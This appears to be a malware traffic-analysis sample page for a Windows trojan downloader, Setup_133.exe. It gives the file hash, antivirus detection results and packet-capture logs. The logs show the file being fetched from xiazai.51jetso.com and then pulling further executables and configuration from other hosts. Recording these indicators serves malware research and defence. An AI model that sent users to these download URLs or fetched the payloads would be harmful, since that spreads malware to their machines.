Setup_133.exe Trojan Malware xiazai.51jetso.com Downloader Traffic Analysis PCAP file download sample

SHA256: 1bec139d54d147196c4e736d8dcf1f39d2bff390d59d5b240b4a97e03763cf72
File name: Setup_133.exe
Detection ratio: 35 / 52
Analysis date: 2016-10-26 22:22:08 UTC
Antivirus      Result                                       Update
AVG            Malware.E52                                  20161026
AVware         Trojan.Win32.Generic!BT                      20161026
Ad-Aware       Gen:Variant.Application.Bundler.Yantai.1     20161026
AegisLab       Troj.W32.Invader!c                           20161026
AhnLab-V3      PUP/Win32.Agent.R182507                      20161026
Antiy-AVL      Trojan/Generic.ASMalwNS.5786                 20161026
Arcabit        Trojan.Application.Bundler.Yantai.1          20161026
Avast          Win32:Malware-gen                            20161026
BitDefender    Gen:Variant.Application.Bundler.Yantai.1     20161026

2016-10-26 01:04:04.255745 IP 192.168.1.102.62261 > 203.130.61.232.80: Flags [P.], seq 0:298, ack 1, win 256, length 298: HTTP: GET /378/Setup_133.exe HTTP/1.1
GET /378/Setup_133.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: xiazai.51jetso.com
Connection: Keep-Alive

2016-10-26 01:04:04.372018 IP 192.168.1.102.62261 > 203.130.61.232.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0

2016-10-26 01:04:10.106007 IP 192.168.1.102.62262 > 23.52.85.163.80: Flags [P.], seq 0:179, ack 1, win 256, length 179: HTTP: GET /pca3.crl HTTP/1.1
GET /pca3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2016-10-26 01:04:14.765747 IP 192.168.1.102.62265 > 220.243.230.247.80: Flags [P.], seq 0:105, ack 1, win 256, length 105: HTTP: GET /soft/kp2configuration.ini HTTP/1.0
GET /soft/kp2configuration.ini HTTP/1.0
Host: khit.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-26 01:04:14.851501 IP 192.168.1.102.62265 > 220.243.230.247.80: Flags [.], ack 2921, win 256, length 0
2016-10-26 01:04:14.852081 IP 192.168.1.102.62265 > 220.243.230.247.80: Flags [.], ack 4404, win 256, length 0
2016-10-26 01:04:14.852344 IP 192.168.1.102.62265 > 220.243.230.247.80: Flags [.], ack 4405, win 256, length 0

2016-10-26 01:04:32.525522 IP 192.168.1.102.62266 > 120.52.89.98.80: Flags [P.], seq 0:110, ack 1, win 256, length 110: HTTP: GET /interface/mc?mcid=5791 HTTP/1.0
GET /interface/mc?mcid=5791 HTTP/1.0
Host: mc.funshion.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-26 01:04:32.784100 IP 192.168.1.102.62266 > 120.52.89.98.80: Flags [.], ack 745, win 253, length 0
2016-10-26 01:04:32.787464 IP 192.168.1.102.62266 > 120.52.89.98.80: Flags [F.], seq 110, ack 745, win 253, length 0
2016-10-26 01:04:32.810628 IP 192.168.1.102.60796 > 75.75.75.75.53: 8912+ A? downloads.funshion.net. (40)

2016-10-26 01:04:33.613630 IP 192.168.1.102.62267 > 121.12.89.170.80: Flags [P.], seq 0:141, ack 1, win 256, length 141: HTTP: GET /tools/cloudinstall/7904/FunWeasley_c7904_s.exe HTTP/1.0
GET /tools/cloudinstall/7904/FunWeasley_c7904_s.exe HTTP/1.0
Host: downloads.funshion.net
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*